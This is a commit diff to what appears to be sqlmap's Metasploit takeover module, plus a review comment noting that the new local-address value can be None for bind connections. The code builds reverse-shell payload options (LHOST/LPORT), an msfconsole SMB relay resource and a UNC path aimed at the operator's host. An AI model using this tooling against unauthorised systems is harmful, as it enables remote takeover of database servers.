Let the user choose also the local address in reverse OOB connection
parent
06e8546177
commit
6f4035938b
|
@ -62,6 +62,7 @@ class Metasploit:
|
||||||
|
|
||||||
def __initVars(self):
|
def __initVars(self):
|
||||||
self.connectionStr = None
|
self.connectionStr = None
|
||||||
|
self.lhostStr = None
|
||||||
self.rhostStr = None
|
self.rhostStr = None
|
||||||
self.portStr = None
|
self.portStr = None
|
||||||
self.payloadStr = None
|
self.payloadStr = None
|
||||||
|
@ -298,12 +299,30 @@ class Metasploit:
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
|
||||||
|
|
||||||
|
def __selectLhost(self):
|
||||||
|
if self.connectionStr.startswith("reverse"):
|
||||||
|
message = "which is the local address? [%s] " % self.localIP
|
||||||
|
address = readInput(message, default=self.localIP)
|
||||||
|
|
||||||
|
if not address:
|
||||||
|
address = self.localIP
|
||||||
|
|
||||||
|
return address
|
||||||
|
|
||||||
|
elif self.connectionStr.startswith("bind"):
|
||||||
|
return None
|
||||||
|
|
||||||
|
else:
|
||||||
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
|
||||||
|
|
||||||
def __selectConnection(self):
|
def __selectConnection(self):
|
||||||
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
|
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
|
||||||
|
|
||||||
|
|
||||||
def __prepareIngredients(self, encode=True, askChurrasco=True):
|
def __prepareIngredients(self, encode=True, askChurrasco=True):
|
||||||
self.connectionStr = self.__selectConnection()
|
self.connectionStr = self.__selectConnection()
|
||||||
|
self.lhostStr = self.__selectLhost()
|
||||||
self.rhostStr = self.__selectRhost()
|
self.rhostStr = self.__selectRhost()
|
||||||
self.portStr = self.__selectPort()
|
self.portStr = self.__selectPort()
|
||||||
self.payloadStr = self.__selectPayload(askChurrasco)
|
self.payloadStr = self.__selectPayload(askChurrasco)
|
||||||
|
@ -323,7 +342,7 @@ class Metasploit:
|
||||||
self.__cliCmd += " RHOST=%s" % self.rhostStr
|
self.__cliCmd += " RHOST=%s" % self.rhostStr
|
||||||
|
|
||||||
elif self.connectionStr.startswith("reverse"):
|
elif self.connectionStr.startswith("reverse"):
|
||||||
self.__cliCmd += " LHOST=%s" % self.localIP
|
self.__cliCmd += " LHOST=%s" % self.lhostStr
|
||||||
|
|
||||||
else:
|
else:
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
@ -339,7 +358,7 @@ class Metasploit:
|
||||||
self.__prepareIngredients(encode=False, askChurrasco=False)
|
self.__prepareIngredients(encode=False, askChurrasco=False)
|
||||||
|
|
||||||
self.__resource = "use windows/smb/smb_relay\n"
|
self.__resource = "use windows/smb/smb_relay\n"
|
||||||
self.__resource += "set SRVHOST %s\n" % self.localIP
|
self.__resource += "set SRVHOST %s\n" % self.lhostStr
|
||||||
self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort()
|
self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort()
|
||||||
self.__resource += "set PAYLOAD %s/%s\n" % (self.payloadStr, self.connectionStr)
|
self.__resource += "set PAYLOAD %s/%s\n" % (self.payloadStr, self.connectionStr)
|
||||||
self.__resource += "set LPORT %s\n" % self.portStr
|
self.__resource += "set LPORT %s\n" % self.portStr
|
||||||
|
@ -348,7 +367,7 @@ class Metasploit:
|
||||||
self.__resource += "set RHOST %s\n" % self.rhostStr
|
self.__resource += "set RHOST %s\n" % self.rhostStr
|
||||||
|
|
||||||
elif self.connectionStr.startswith("reverse"):
|
elif self.connectionStr.startswith("reverse"):
|
||||||
self.__resource += "set LHOST %s\n" % self.localIP
|
self.__resource += "set LHOST %s\n" % self.lhostStr
|
||||||
|
|
||||||
else:
|
else:
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
@ -369,7 +388,7 @@ class Metasploit:
|
||||||
self.__payloadCmd += " LPORT=%s" % self.portStr
|
self.__payloadCmd += " LPORT=%s" % self.portStr
|
||||||
|
|
||||||
if self.connectionStr.startswith("reverse"):
|
if self.connectionStr.startswith("reverse"):
|
||||||
self.__payloadCmd += " LHOST=%s" % self.localIP
|
self.__payloadCmd += " LHOST=%s" % self.lhostStr
|
||||||
|
|
||||||
elif not self.connectionStr.startswith("bind"):
|
elif not self.connectionStr.startswith("bind"):
|
||||||
raise sqlmapDataException, "unexpected connection type"
|
raise sqlmapDataException, "unexpected connection type"
|
||||||
|
@ -641,13 +660,14 @@ class Metasploit:
|
||||||
self.__initVars()
|
self.__initVars()
|
||||||
self.__randFile = "sqlmapunc%s.txt" % randomStr(lowercase=True)
|
self.__randFile = "sqlmapunc%s.txt" % randomStr(lowercase=True)
|
||||||
|
|
||||||
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
|
||||||
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.localIP, self.__randFile)
|
|
||||||
else:
|
|
||||||
self.uncPath = "\\\\%s\\%s" % (self.localIP, self.__randFile)
|
|
||||||
|
|
||||||
self.__forgeMsfConsoleResource()
|
self.__forgeMsfConsoleResource()
|
||||||
self.__forgeMsfConsoleCmd()
|
self.__forgeMsfConsoleCmd()
|
||||||
|
|
||||||
|
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
||||||
|
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile)
|
||||||
|
else:
|
||||||
|
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
|
||||||
|
|
||||||
self.__runMsfConsole()
|
self.__runMsfConsole()
|
||||||
|
|
||||||
debugMsg = "Metasploit Framework 3 console exited with return "
|
debugMsg = "Metasploit Framework 3 console exited with return "
|
||||||
|
|
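Review bot: The new `__selectLhost` returns `None` for bind connections, but `set SRVHOST %s` in the SMB relay resource and both `uncPath` assignments in the last hunk now format `self.lhostStr` with no visible connection-type check. If a bind payload can reach that path (the `set RHOST` / `elif ... "reverse"` lines in the same resource builder suggest it can), the resource file gets `set SRVHOST None` and the UNC path points at a host named `None`, where the old code always used `self.localIP`. A fallback keeps the old behaviour, e.g. `self.__resource += "set SRVHOST %s\n" % (self.lhostStr or self.localIP)` and the same `(self.lhostStr or self.localIP)` in the two `uncPath` lines. Separately, the value from `readInput` goes unvalidated into the `LHOST=`/`set LHOST` strings, so checking that it is a single address with no whitespace would stop a typo from producing a malformed directive. The enclosing methods begin and end outside the hunks shown, so the branch structure here is inferred from the visible lines.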